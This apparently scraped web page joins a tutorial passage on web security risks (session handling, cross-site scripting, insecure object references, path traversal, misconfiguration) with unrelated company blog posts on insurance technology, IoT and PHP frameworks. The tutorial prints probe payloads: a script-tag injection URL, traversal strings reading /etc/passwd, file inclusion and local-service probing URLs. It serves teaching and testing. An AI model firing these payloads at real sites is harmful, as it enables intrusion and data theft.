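    def __init__(self, users: Dict[str, str], clock=time.time):
        self._users = users                      # username -> hash_password(...) string
        self._clock = clock                      # injectable so tests can move time
        self._sessions: Dict[str, dict] = {}     # session id -> {"user", "last_seen"}
        self._failures: Dict[str, List[float]] = {}

    def new_anonymous_session(self) -> str:
        sid = secrets.token_urlsafe(32)          # 256 random bits from the CSPRNG
        self._sessions[sid] = {"user": None, "last_seen": self._clock()}
        return sid

    def _locked_out(self, username: str) -> bool:
        now = self._clock()
        recent = [t for t in self._failures.get(username, []) if now - t < LOCKOUT_WINDOW]
        self._failures[username] = recent
        return len(recent) >= MAX_FAILED_LOGINS

    def login(self, sid: str, username: str, password: str) -> Optional[str]:
        """On success returns a NEW session id and forgets the pre-login one, so an id
        planted before login (session fixation) never becomes authenticated."""
        if self._locked_out(username):
            return None
        stored = self._users.get(username)
        ok = verify_password(password, stored or DUMMY_HASH) and stored is not None
        if not ok:
            self._failures.setdefault(username, []).append(self._clock())
            return None
        self._sessions.pop(sid, None)
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = {"user": username, "last_seen": self._clock()}
        return new_sid

    def current_user(self, sid: str) -> Optional[str]:
        """Resolve a cookie value to a user, enforcing the idle timeout."""
        session = self._sessions.get(sid)
        if session is None:
            return None
        if self._clock() - session["last_seen"] > SESSION_IDLE_SECONDS:
            del self._sessions[sid]
            return None
        session["last_seen"] = self._clock()
        return session["user"]

    def logout(self, sid: str) -> None:
        """Invalidate server side; clearing only the cookie leaves the id usable."""
        self._sessions.pop(sid, None)
```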

Examples of broken authentication and session management:

3. CROSS SITE SCRIPTING

This is when a browser unknowingly executes scripts to hijack sessions or redirect to a rogue site.

Cross-site Scripting (XSS) refers to a client-side code injection attack wherein an attacker can inject malicious scripts (also commonly referred to as a malicious payload) into a legitimate website or web application. XSS is amongst the most rampant of web application vulnerabilities and occurs when a web application uses unvalidated or unencoded user input within the output it generates.

By leveraging XSS, an attacker does not target a victim directly. Instead, an attacker would exploit a vulnerability within a website or web application that the victim would visit, essentially using the vulnerable website as a vehicle to deliver a malicious script to the victim’s browser.

There are basically two types of XSS:

a) Stored XSS

b) Reflected XSS

Stored XSS

  • A Stored Cross Site Scripting vulnerability occurs when the malicious user can store some attack which will be called at a later time upon some other unknowing user. The attack is actually stored somewhere to be executed later.
  • The storage could involve a database, a wiki or a blog. Basically the malicious user has stored some type of attack that will be executed when an unknowing user encounters it. The stored method not only has the problem of incorrect input validation, but also of output validation. Even if data has been sanitized on input, it should also be checked during the output process. By checking and validating the output, you could also uncover unknown issues in the input validation process.

Reflected XSS

  • The malicious user has discovered that a field within a website or web application holds an XSS vulnerability. This malicious user then crafts a way to use the vulnerability to execute something malicious against some unknowing user. Reflected XSS vulnerabilities occur when an unknowing user is directed by the malicious user to a web application that has an XSS vulnerability. Once the unknowing user gets to the website or application, the malicious user's attack is executed.
  • The attack is crafted as a series of URL parameters that are sent via a URL. The malicious user then sends his/her malicious URL with the URL parameters to unknowing users. This is typically sent by email, instant message, blogs or forums, or any other possible method.

How to test for XSS injection vulnerabilities, example:

You can determine very easily whether a web-based application is vulnerable to XSS attacks. A simple test is to take a parameter that is sent in the HTTP GET request and modify it. Take for example the following request in the browser address bar. This URL takes a name parameter that you enter in a textbox and prints something on the page, like “Hello George, thank you for coming to my site”:

http://www.yoursite.com/index.html?name=george

Now modify it so that some additional information is added to the parameter. For example, try entering something similar to the following request in the browser address bar.

http://www.yoursite.com/index.html?name=<script>alert('You just found a XSS vulnerability')</script>

If this pops up an alert message box stating “You just found a XSS vulnerability”, then you know this parameter is vulnerable to XSS attacks. The name parameter is not being validated; it allows anything to be processed as a name, including a malicious script injected into the parameter. Basically, where the name George would normally be written on the page, the injected script is instead being written into the dynamic page.

The alert message is just an example of how to test for the XSS vulnerability.
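As an added example (not code from the original post), here are two hypothetical versions of the page behind the URL above, written in Python so they can be run offline: one reflects the name parameter into the HTML as-is, the other HTML-encodes it first. The reflects_unencoded function automates the manual check the text describes by sending the probe and looking for it verbatim in the response. The handler names, the page text and the probe string are assumptions.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Added example, not code from the original post. Two hypothetical versions of
# the page behind http://www.yoursite.com/index.html?name=... : one reflects the
# parameter as-is, the other HTML-encodes it first. ``reflects_unencoded``
# automates the manual test described in the text.

PROBE = "<script>alert('You just found a XSS vulnerability')</script>"


def _name_param(url: str) -> str:
    """Pull the ``name`` query parameter out of a full URL (percent-decoded)."""
    return parse_qs(urlsplit(url).query).get("name", [""])[0]


def vulnerable_page(url: str) -> str:
    """Reflected XSS: untrusted input is concatenated straight into the HTML."""
    return "<p>Hello " + _name_param(url) + ", thank you for coming to my site</p>"


def hardened_page(url: str) -> str:
    """Same page with output encoding for the HTML-body context.

    html.escape(quote=True) turns & < > " ' into entities, so the browser shows
    the probe as text instead of executing it. Other contexts (attribute values,
    JavaScript, URLs) need their own encoders; this covers the HTML body only.
    """
    return "<p>Hello " + html.escape(_name_param(url), quote=True) + ", thank you for coming to my site</p>"


def reflects_unencoded(handler, base_url: str, param: str, probe: str = PROBE) -> bool:
    """The manual test from the text, automated: send the probe in ``param``
    and report whether it comes back verbatim in the response body.

    Checking the raw response is more reliable than waiting for an alert box,
    because a browser or framework may neutralise this one payload while the
    parameter is still reflected without encoding.
    """
    body = handler(f"{base_url}?{param}={quote(probe, safe='')}")
    return probe in body


if __name__ == "__main__":
    for page in (vulnerable_page, hardened_page):
        hit = reflects_unencoded(page, "http://www.yoursite.com/index.html", "name")
        print(f"{page.__name__}: {'VULNERABLE' if hit else 'encoded'}")
```

Against a real target the same check is done with the HTTP client of your choice: percent-encode the probe, request the page, and search the response body for the probe unchanged.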

Some examples of cross-site scripting attack vectors:

http://hackersonlineclub.com/cross-site-scripting-xss/

Tools that can be used:

OWASP ZAP (zaproxy): free and open source.

https://github.com/zaproxy/zaproxy/wiki/Downloads

Burp Suite can also be used to find XSS vulnerabilities, and BeEF (the Browser Exploitation Framework) to demonstrate what an injected script can do once it runs in a victim's browser.

4.INSECURE DIRECT OBJECT REFERENCES

An attacker can access a reference to a file or directory and manipulate that reference to gain unauthorized access to other objects.

A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. An attacker can manipulate direct object references to access other objects without authorization, unless an access control check is in place.

  • Vulnerability to Insecure Direct Object References
  1. For direct references to restricted resources, does the application fail to verify the user is authorized to access the exact resource they have requested?
  2. If the reference is an indirect reference, does the mapping to the direct reference fail to limit the values to those authorized for the current user?
  • To test Insecure Direct Object References

To test for this vulnerability the tester first needs to map out all locations in the application where user input is used to reference objects directly. For example, locations where user input is used to access a database row, a file, application pages and more. Next the tester should modify the value of the parameter used to reference objects and assess whether it is possible to retrieve objects belonging to other users or otherwise bypass authorization.

The best way to test for direct object references is to have at least two (often more) users to cover different owned objects and functions. For example, two users each having access to different objects (such as purchase information, private messages, etc.), and (if relevant) users with different privileges (for example administrator users) to see whether there are direct references to application functionality. By having multiple users the tester saves valuable testing time guessing object names, as they can simply attempt to access objects that belong to the other user.

Some basic examples:

The value of a parameter is used directly to retrieve a database record

Sample request:

http://foo.bar/somepage?invoice=12345

  • In this case, the value of the invoice parameter is used as an index in an invoices table in the database. The application takes the value of this parameter and uses it in a query to the database. The application then returns the invoice information to the user.
  • Since the value of invoice goes directly into the query, by modifying the value of the parameter it is possible to retrieve any invoice object, regardless of the user to whom the invoice belongs. To test for this case the tester should obtain the identifier of an invoice belonging to a different test user (ensuring they are not supposed to view this information per the application's business logic), and then check whether it is possible to access that object without authorization.

Examples of the attack:

https://hackerone.com/reports/12011

https://hackerone.com/reports/42587
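The invoice lookup above, as an added Python example (not code from the original post or from the linked reports): the vulnerable handler uses the invoice parameter as the lookup key with no ownership check, the hardened handler verifies that the exact object belongs to the current user, and an indirect-reference map shows the second approach from the checklist. The invoice data, user names and function names are constructed for the example.

```python
from dataclasses import dataclass
from typing import Callable, Optional

# Added example, not code from the original post. Constructed sample data stands
# in for the invoices table behind http://foo.bar/somepage?invoice=12345; the
# function and user names are hypothetical.


@dataclass(frozen=True)
class Invoice:
    invoice_id: int
    owner: str
    amount: float


INVOICES = {
    12345: Invoice(12345, "alice", 120.00),
    12346: Invoice(12346, "bob", 75.50),
    12347: Invoice(12347, "alice", 9.99),
}


class Forbidden(Exception):
    """Raised when the caller may not see the requested object."""


def get_invoice_vulnerable(current_user: str, invoice_param: str) -> Optional[Invoice]:
    """Insecure direct object reference: the parameter is the lookup key and
    nobody checks that the record belongs to ``current_user``."""
    return INVOICES.get(int(invoice_param))


def get_invoice_hardened(current_user: str, invoice_param: str) -> Invoice:
    """Direct reference kept, but with an ownership check on the exact object.

    A record the caller does not own is reported exactly like a missing one, so
    the response does not confirm which identifiers exist.
    """
    try:
        invoice_id = int(invoice_param)
    except ValueError:
        raise Forbidden("invoice not found") from None
    invoice = INVOICES.get(invoice_id)
    if invoice is None or invoice.owner != current_user:
        raise Forbidden("invoice not found")
    return invoice


def indirect_references(current_user: str) -> dict:
    """Indirect reference map: opaque per-user keys -> real ids, built only
    from objects the user is authorized to access (the check in question 2).
    A production map would use random per-session tokens rather than inv1, inv2."""
    owned = sorted(i.invoice_id for i in INVOICES.values() if i.owner == current_user)
    return {f"inv{n}": real_id for n, real_id in enumerate(owned, start=1)}


def get_invoice_indirect(current_user: str, opaque_key: str) -> Invoice:
    """Resolve an opaque key through the caller's own map; keys outside it fail."""
    mapping = indirect_references(current_user)
    if opaque_key not in mapping:
        raise Forbidden("invoice not found")
    return INVOICES[mapping[opaque_key]]


def two_user_test(attacker: str, victim: str, fetch: Callable) -> bool:
    """The two-user test from the text: acting as ``attacker``, request every
    invoice id that belongs to ``victim``. True means cross-user access worked."""
    victim_ids = [str(i.invoice_id) for i in INVOICES.values() if i.owner == victim]
    for ref in victim_ids:
        try:
            if fetch(attacker, ref) is not None:
                return True
        except Forbidden:
            continue
    return False


if __name__ == "__main__":
    for fetch in (get_invoice_vulnerable, get_invoice_hardened):
        print(f"{fetch.__name__}: idor={two_user_test('bob', 'alice', fetch)}")
```

The hardened lookup deliberately returns the same error for "does not exist" and "not yours"; distinguishing the two would let an attacker enumerate valid identifiers even when the data itself stays protected.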

Testing for path traversal / file include

Many web applications use and manage files as part of their daily operation. When input validation has not been well designed or deployed, an attacker can exploit the system to read or write files that were never intended to be accessible.

Techniques to test for this flaw

In order to determine which parts of the application are vulnerable to input validation bypassing, the tester needs to enumerate all parts of the application that accept content from the user. Here are some examples of the checks to be performed at this stage:

Are there request parameters which could be used for file-related operations?

Are there unusual file extensions?

Are there interesting variable names?

http://example.com/getUserProfile.jsp?item=ikki.html

http://example.com/index.php?file=content

http://example.com/main.cgi?home=index.htm

An attacker could insert the string "../../../../etc/passwd" to read the user account file of a Linux/UNIX system (on modern systems the password hashes live in /etc/shadow, which is normally readable only by root). This attack succeeds only if the validation checkpoint fails and, subject to file-system permissions, the web application's own process is able to read the target file.

http://example.com/getUserProfile.jsp?item=../../../../etc/passwd

It is also possible to include files and scripts located on an external website (remote file inclusion):

http://example.com/index.php?file=http://www.owasp.org/malicioustxt

If protocols are accepted as arguments, as in the above example, it’s also possible to probe the local filesystem this way.

http://example.com/index.php?file=file:///etc/passwd

If protocols are accepted as arguments, as in the above examples, it is also possible to probe local and nearby services (server-side request forgery):

http://example.com/index.php?file=http://localhost:8080

http://example.com/index.php?file=http://192.168.0.2:9080

Example of path traversal: https://hackerone.com/reports/150018
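The getUserProfile.jsp?item= handler from the examples above, rewritten twice in Python as an added example (not code from the original post or the linked report): the vulnerable version joins the parameter onto a base directory, the hardened version rejects URL schemes and any path that resolves outside the document root. The document root, file names and the secret file are constructed in a temporary directory so the block runs offline.

```python
import os
import tempfile
from pathlib import Path
from urllib.parse import urlsplit

# Added example, not code from the original post. A hypothetical handler for
# getUserProfile.jsp?item=... written twice: the vulnerable concatenation and a
# hardened resolver that pins every reference inside the document root.


class Forbidden(Exception):
    """Raised for any reference that leaves the document root or names a URL."""


def read_profile_vulnerable(root: Path, item: str) -> str:
    """Joins the parameter onto the base directory. '../' is honoured and an
    absolute path replaces the base entirely, so ../../../../etc/passwd works."""
    return Path(os.path.join(root, item)).read_text()


def resolve_safely(root: Path, item: str) -> Path:
    """Accept only names that stay inside ``root`` once '..' and symlinks are
    resolved; reject URL schemes (remote/local file inclusion, SSRF probes)
    and null bytes outright."""
    if "\x00" in item:
        raise Forbidden("null byte in path")
    if urlsplit(item).scheme:  # http://, file://, ... as in the examples above
        raise Forbidden("URL schemes are not allowed")
    base = root.resolve()
    target = (base / item).resolve()  # an absolute ``item`` discards ``base`` here too
    try:
        inside = os.path.commonpath([base, target]) == str(base)
    except ValueError:  # different drives on Windows
        inside = False
    if not inside:
        raise Forbidden("path escapes document root")
    return target


def read_profile_hardened(root: Path, item: str) -> str:
    return resolve_safely(root, item).read_text()


def demo() -> dict:
    """Build a throwaway document root with one profile page and one secret
    file two levels above it (constructed data standing in for /etc/passwd),
    then run the payloads from the text against both handlers."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        top = Path(tmp)
        root = top / "www" / "profiles"
        root.mkdir(parents=True)
        (root / "ikki.html").write_text("<h1>ikki</h1>")
        (top / "secret.txt").write_text("root:x:0:0")
        results["vuln_normal"] = read_profile_vulnerable(root, "ikki.html")
        results["vuln_traversal"] = read_profile_vulnerable(root, "../../secret.txt")
        results["hard_normal"] = read_profile_hardened(root, "ikki.html")
        for payload in ("../../secret.txt", "/etc/passwd", "file:///etc/passwd",
                        "http://www.owasp.org/malicioustxt", "http://localhost:8080"):
            try:
                read_profile_hardened(root, payload)
                results[payload] = "ALLOWED"
            except Forbidden as exc:
                results[payload] = f"blocked: {exc}"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:35} {value}")
```

Resolving before comparing matters: a check that merely looks for "../" in the string misses encoded variants and symlinks that point outside the root, whereas comparing the resolved path against the resolved base catches both.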

5.SECURITY MISCONFIGURATION

Improper server or web application configuration leads to a variety of flaws, for example:

  • Debugging enabled
  • Incorrect folder permissions
  • Using default accounts or passwords

Vulnerability to Security Misconfiguration

Is your application missing the proper security hardening across any part of the application stack? Including:

  1. Is any of your software out of date? This software includes the OS, Web/App Server, DBMS, applications, APIs, and all components and libraries.
  2. Are any unnecessary features enabled or installed (e.g., ports, services, pages, accounts, privileges)?
  3. Are default accounts and their passwords still enabled and unchanged?
  4. Does your error handling reveal stack traces or other overly informative error messages to users?
  5. Are the security settings in your application servers, application frameworks (e.g., Struts, Spring, ASP.NET), libraries, databases, etc. not set to secure values?

Attack scenarios:

Scenario #1: The app server admin console is automatically installed and not removed. Default accounts aren’t changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.

Scenario #2: Directory listing is not disabled on your web server. An attacker discovers they can simply list directories to find any file. The attacker finds and downloads all your compiled Java classes, which they decompile and reverse engineer to get all your custom code. Attacker then finds a serious access control flaw in your application.

Scenario #3: App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws such as framework versions that are known to be vulnerable.

Scenario #4: App server comes with sample applications that are not removed from your production server. These sample applications have well known security flaws attackers can use to compromise your server.

Protection against Security misconfigurations:

  • Install latest updates and security patches. Have an easy to manage updating process with test environments to check updates before deploying to production environments.
  • Remove sample applications that ship with content delivery systems and web frameworks. Most tools that help build web applications include demo and sample code to help teach developers how to use the tools and get you started. These samples and demos should be removed. They provide a known target for anyone attempting to compromise web application security.
  • Remove unused features, plugins and web pages. Only include the parts of web applications that you need to provide your service to end users. Remove any plugins or functionality that you are not using.
  • Turn off access to setup and configuration pages. Don’t leave the setup and configuration pages available for users to use.
  • Change usernames, passwords and ports for default accounts. Web application frameworks and libraries often ship with default administration names, passwords and access ports enabled. Everyone knows these. Change all these to non standard usernames, passwords and ports.
  • Don’t share passwords between accounts on Dev, Test and Production systems. Related to the point above. Don’t use the same administration accounts and settings across your Dev, Test and Production systems.
  • Turn off debugging so that internal information isn't sent back in response to test queries or errors. Excessive debugging output can be used to glean details of a web application's configuration.
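Scenario #3 and the last bullet above, as an added Python example (not code from the original post): one error handler run with debugging on and off. With debug on, the full stack trace goes to the client; with it off, the client gets a generic message plus an incident id and the trace goes only to the server log. The handler name, the response shape and the leak detector are assumptions made for the example.

```python
import logging
import traceback
import uuid

# Added example, not code from the original post. ``handle_error`` stands in
# for a framework's unhandled-exception hook; a response is modelled as a
# (status, headers, body) tuple.

log = logging.getLogger("app")


def handle_error(exc: BaseException, debug: bool) -> tuple:
    """Turn an unhandled exception into an HTTP 500 response.

    debug=True is the misconfiguration from Scenario #3: the stack trace, with
    file paths and framework module names, is sent to the client.
    debug=False is the hardened form: the client sees a generic message and an
    incident id; the trace is written only to the server log under that id, so
    support staff can still find it.
    """
    incident_id = uuid.uuid4().hex
    trace = "".join(traceback.format_exception(type(exc), exc, exc.__traceback__))
    log.error("incident %s\n%s", incident_id, trace)
    if debug:
        body = "<pre>" + trace + "</pre>"
    else:
        body = f"<p>Something went wrong. Reference: {incident_id}</p>"
    return 500, {"Content-Type": "text/html"}, body


def leaks_internals(body: str) -> bool:
    """Crude check a tester can run over responses: a traceback header or a
    quoted source file path in the body means internals are being exposed."""
    return "Traceback (most recent call last)" in body or 'File "' in body


def simulate(debug: bool) -> tuple:
    """A hypothetical request handler that fails on a missing parameter and
    routes the exception through handle_error, returning the response tuple."""
    params = {}  # constructed: a request that carries no 'user' field
    try:
        user = params["user"]  # raises KeyError
    except KeyError as exc:
        return handle_error(exc, debug)
    return 200, {"Content-Type": "text/html"}, f"<p>Hello {user}</p>"


if __name__ == "__main__":
    for debug in (True, False):
        status, _, body = simulate(debug)
        print(f"debug={debug}: status={status} leaks={leaks_internals(body)}")
```

The incident id is what makes the hardened form usable in practice: the user can quote it to support, and the operator can find the full trace in the log without it ever leaving the server.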

Good read:

https://lockmedown.com/owasp-5-security-misconfiguration-hardening-your-asp-net-app/

Stay tuned for the rest of the security risks; they are coming shortly.


InsurTech: Present and Future of Insurance Technology

Insurers need to adopt technology that offers their customers more efficient, optimized and relevant policies: ones that can be customized with data from a wearable or mobile device, or ones that apply for just an hour. Alongside such customer-focused initiatives, they still need to achieve core business objectives like price and operational efficiency and compliance with stringent regulations. Can InsurTech meet these expectations? Can technology lend a helping hand? Let's explore how the insurance vertical is evolving with the latest technology and what its future holds.

The Present of InsurTech

Insurance firms are under immense pressure to put their house in order, and customized policies, risk mitigation strategies, real-time analytics, instant claim settlement, sensors, drones and augmented reality (AR) apps are all playing a significant role. So, which technologies have the firms adopted? Let's take a closer look.

Robo-Advisory Services

Robo-Advisors have seen broad adoption across the insurance sector. Unlike the old days, when hiring a financial advisor was out of reach for many individuals, Robo-advisors let people in lower-income groups use DIY advice for their financial portfolio. Should you opt for cover for all critical illnesses or only a few? Is an integrated policy better than an individual one? These are some of the questions that Robo-Advisory services can answer.

Policies via Sensors, Detectors, and Telematics

Sensors and detectors connected via the internet can send early signals of smoke or radiation to rescue services, helping to minimize damage. Telematics, such as monitoring vehicle speed or the behavior of a rash driver, can help both the individual and the insurer make a clear judgment about claims and policies. So while IoT and interconnected networks could be a boon for offering customized policies, these minuscule devices are taking insurance services to the next step.

The Future of InsurTech

Could technologies like Blockchain, Augmented Reality and Virtual Reality change the way the world sees the insurance sector? Would they bring in exotic flavors of policies? Only time can tell; for now, let's explore how these technologies could be useful in the insurance sector.

Blockchain

Distributed ledger technology has the potential to ease fraud detection and risk prevention, as per a report from EY. The report also highlights that blockchain is efficient at establishing transparent, customer-focused claims, building trust and loyalty for insurance firms.

Augmented or Virtual Reality

Just imagine driving in stormy weather while an AR app outlines the road and lane borders so that you do not hit a tree or a car in the adjacent lane. Or how about 3D modeling and simulations that help customers make insurance claims more easily and faster? Or a simulation that, before you buy home insurance, helps you pinpoint all the areas under cover rather than reading the lengthy document? All of this is possible with AR and VR technologies.

With the evolution of technologies, the secret is to be adaptable to change. At Mantra Labs we believe in this, and hence one of our esteemed clients, Religare, is using our InsurTech solutions in post-sale, pre-claim, post-claim and renewal processes. It helps provide customers with transparent and intuitive services that are robust and secure for businesses. A win-win for all.

Reference Links:

https://assets.kpmg.com/content/dam/kpmg/xx/pdf/2016/10/how-augmented-and-virtual-reality-changing-insurance-landscape.pdf

https://www.realexpayments.com/blog/augmented-reality-insurance-businesses/

IOT in Insurance Sector: Home, Auto and Health Insurance

The Internet of Things is helping the insurance industry as well. Based on the reports we have read, it is set to transform the insurance industry in flexible and exciting ways. Last month the Accenture insurance blog stated that 39% have already launched or are piloting connected-home or connected-building initiatives that use the Internet of Things, and 44% consider connected devices to be a driver of future insurance revenue growth.

The future of insurance is set to be completely transformed by IoT. Some insurance companies have already adopted IoT and insurance tech, such as Bajaj Allianz, ICICI Lombard and HDFC Life.

 


Image Source: iamwire

In this article we discuss how IoT is helping home, auto and health insurance businesses.

Health Insurance:

Wearable devices such as fitness bands like FitBit help people, especially the elderly, track their health details constantly. This information can further help doctors treat patients requiring immediate medical attention. Insurance companies, at the same time, can reduce claims by offering incentives to policyholders to use these kinds of devices.

Home Insurance:

Sensors and detectors connected via the internet can send early signals of smoke or radiation to rescue services, helping to minimize damage. Information from interconnected smart devices at home can also be used by insurers to determine how well safety is maintained in the home. In the first place, people use smart devices to keep an eye on their home while they are away. This reduces incidents of theft or burglary and saves people from losing their precious assets. Eventually, it also brings down the claims raised by households.

Auto Insurance:

Telematics, such as monitoring vehicle speed or the behavior of a rash driver, can help both the individual and the insurer make a clear judgment about claims and policies.

So while IoT and interconnected networks could be a boon for offering policies, these minuscule devices are taking insurance services to the next step. The huge amount of data generated by IoT devices can be used for predictions and for understanding the market and customers, which will help distribute policies very effectively and deliver great customer satisfaction.

Laravel 5.4 Vs Yii2 : PHP Frameworks Comparison


PHP frameworks make development faster. Among the many frameworks, Laravel and Yii are two widely used ones. The recent releases are Laravel 5.4 and Yii2; we have analyzed the functioning of both frameworks from the developer's point of view.

Requirements

Yii is used by programmers for developing web portals and much more. The latest version, Yii2, requires PHP 5.4 or higher.
Laravel is designed for building high-end web applications. Laravel 5.4 runs only on PHP 5.6.4 or higher.
Laravel also requires the OpenSSL, Mbstring and Tokenizer PHP extensions.

Extensions

Both frameworks offer a range of useful extensions, and programmers can find many valuable ones for each. Laravel has a larger number of user-contributed and commercial extensions than Yii2, covering a wider range of functionality.

Object Relational Mapping

Yii2 features Data Access Objects, Doctrine2 through plugins, and the Active Record pattern. Laravel provides the same.

Laravel's ORM is Eloquent; Yii's is Active Record.

Security

Yii2 and Laravel 5.4 both offer security features for authentication, authorization, SQL injection prevention and CSRF protection. In Yii2 these are coupled with the core code, whereas Laravel provides several of them through extension packages.

Performance

When it comes to performance, Yii is considerably faster than Laravel: Laravel 5.4 takes about 2 ms of application startup time, whereas Yii2 starts in about 1 ms.
Yii also has an excellent caching system that supports database, page, Memcache, XCache, fragment caching and APC, while Laravel's cache backends include database, Memcached and Redis.

Templating Engine

Laravel 5.4 uses the Blade templating engine, which is simple yet powerful and, unlike other PHP templating engines, lets you use plain PHP code in views. Blade view files use the .blade.php extension. The Vue.js JavaScript framework can be used with Laravel.
Yii doesn't use any third-party templating system by default, but the Twig or Smarty template engines can be used.

Conclusion

The selection of a framework is clearly based on project requirements. Yii overtakes Laravel in some aspects like security and performance, while programmers who want to avoid coding flaws should use the Laravel framework.

Both frameworks have their own pros and cons, but Laravel and Yii are both excellent frameworks to work with.

Top Latest Trends in Insurance Tech


Today, the insurance industry is in a digital transformation phase to enhance its business models. There are a few key areas we can expect insurers to embrace as they seek to create more automated, user-friendly processes in the insurance sector.

Use of automation and artificial intelligence

The insurance industry is shifting towards automating more complex and risky processes rather than using traditional methods, which are less effective in terms of time and accuracy. Emerging technologies like Artificial Intelligence and Machine Learning provide the scope for intelligent automation to analyse the huge amount of data generated by IoT and smart wearable devices. This analysis and cross-checking of data helps with better customer insights, fraud detection, and claims verification and processing.

With more refined automation and the capability to analyse more data, insurance companies like AIG have started employing smart drones for automated property assessment and claims processing, which not only helps with accurate assessment but also reduces operational cost.

Redefining insurance distribution

For a better user experience, insurers have already generalized new distribution channels such as online research, comparison platforms and chatbots for better interaction and understanding, which has already affected the personal insurance market. New direct distribution channels and online comparison platforms for small direct insurance are likely to become more effective in the coming days.

Companies like Allstate already allow small business owners to buy policies in just five minutes, and P2P platforms like Gather give small business owners the opportunity to self-insure, with coverage offered through a captive that is owned by the businesses it insures. This offers greater transparency and reduces policy costs for these types of enterprise.

Insurance through value chain disaggregation

As the market grows, specialization in sectors is becoming more popular. As insurers move into advanced digital stages there is more use of data, automation, connectivity, ecosystem integration, new development methodologies, and smarter use of IT resources. Some companies provide the customer interface with unique value propositions; others provide specialized software tools for insurers.

Companies like PolicyBazar provide insurance comparison and give customized suggestions and recommendations based on customer needs and choices, using artificial intelligence.

Data analytics to improve profitability and better customer experience

The exponentially greater availability of data and the better analytical capability of software provide the basis for decision making. Cross-checking and analysing large amounts of data from unstructured sources such as social media, and real-time data from connected devices, enables better risk management, driving greater profitability as well as a better customer experience. By applying a combination of techniques such as predictive modeling, text mining, database searches and exception reporting, insurers are able to gain better customer insight and fraud analytics, which help them build insight-driven strategies and risk mitigation strategies.

Sensors, Detectors, and Telematics  for building data

IoT, or the Internet of Things, refers to physical objects embedded with sensors that gather information about specific objects and transmit it. The transmitted data is then analyzed as discussed earlier.

In insurance, the use of IoT technologies is becoming more popular. In home insurance, smart homes are one of the fastest growing segments; insurance companies are giving larger discounts on policies for an internet-connected home or smart home.

Various wearable devices are also in demand, as they enable life and health insurers to engage better with customers while obtaining real-time insight into risk. Aditya Birla Health Insurance offers its policyholders health benefits and rewards for connecting approved apps and wearable devices to its health app so that it can track their activity.

Property and casualty insurance companies like AIG are going to use smart drones for better property assessment.

Blockchain Technology for fraud detection

In the coming days, Distributed Ledger Technology (DLT), or blockchain, is going to be leveraged across all sectors, including insurance, for its revolutionary way of sending, receiving and storing information in a secure and decentralized manner. Using blockchain in insurance will improve the quality of service, increase the volume of data from new data sources, automate claims, and reduce operational costs. It has the potential to ease fraud detection and risk prevention, as per a report from EY.

Once insurance and blockchain technology are interconnected, key business processes like policy management and claims management are likely to be transformed, and new business models are expected to emerge using blockchain.

Augmented Reality/Virtual Reality in Insurance

Though Augmented Reality is leveraged by many other sectors, such as social media and gaming, in the insurance sector it is still limited to areas like marketing and training, where it simplifies complex explanations for customers and employees. How about 3D modeling and simulations that help customers make insurance claims more easily and faster? Or a simulation that, before you buy home insurance, helps you pinpoint all the areas under cover rather than reading the lengthy document?

There are big challenges ahead for insurers. With technologies changing so fast, executives will need to consider the opportunities carefully.


IoT World is getting trendier and fashionable with these Latest trends


Let your treadmill pass its data to your wearable, to be read on your smartphone with visuals and analytics. Or how about casting your mobile to the office projector while everyone is having their evening snacks and enjoying live cricket?

Let's see what the latest trends in IoT are.

Welcome to Connected World!

Research firms like Gartner say 8.4 billion connected "things" will be in use in 2017, up 31 percent from 2016. Meanwhile, firms like Intel predict that there will be 200 billion connected devices by 2020. With such rapid growth, start-ups and big firms alike are keen to watch the space. So here are the latest trends shaping the world of IoT (the Internet of Things).

An Increase in Miniscule Products

Products like sensors and cameras may be small, but the power they hold makes them sustainable in the long run. Smart homes, smart cars, climate control and home security are some of the areas that need these sensors and devices. In future we may see them as default items in the IoT world, but for now they are the stepping stones and will create an impact in the IoT domain.

Evolution of IoT Squares 

A peculiar case in IoT is that Amazon Prime Video cannot be cast via Google Chromecast; the user needs to purchase an Amazon Fire Stick to enable casting. With such a wide range of hardware and software, users can't be loyal to just one firm. Hence the need for gateways that allow software, hardware, apps and devices from various vendors to connect, interact and communicate without needing to be changed.

These marketplaces would help not only users but also firms that want to automate their legacy equipment. They could simply tap into industrial drivers, hubs, data visualization, monitoring and data mapping modules and reap the benefits.

Let the Data Do the Talking

Big Data is no longer an emerging trend but a default technology adopted by most businesses. However, using Big Data with an IoT cloud could help many firms make informed decisions. For example, an InsurTech firm could gather the driving behavior and patterns of its customers using sensors and design customized policies that suit their needs.

IoT analytics is an upcoming trend, and many start-ups are eager to provide optimal solutions to other businesses.

Integrate IoT with Machine Learning

Machine learning is another emerging trend that experts are confident will change the future, but its benefits could be manifold if it is integrated with IoT. Mantra's innovative solution XAVI is a good example. Imagine entering your home after a long, tiring day and wishing someone could switch on your lights, TV and air conditioner. XAVI is a genie that lets you do so with your voice or through a mobile app. As you get comfortable on your sofa, you could issue a command to list all English movies airing in the next 15 minutes, and in no time you would have the list on your TV screen.

It would also help firms gather data on individual usage patterns and assist them in building more cognitive technology.

Security the Major Opportunity

With every new technology the first question posed is: is it safe? While many people believe interconnection could make systems more vulnerable to attack, the opportunists see it as a space to explore and come up with more robust solutions to keep devices and data protected.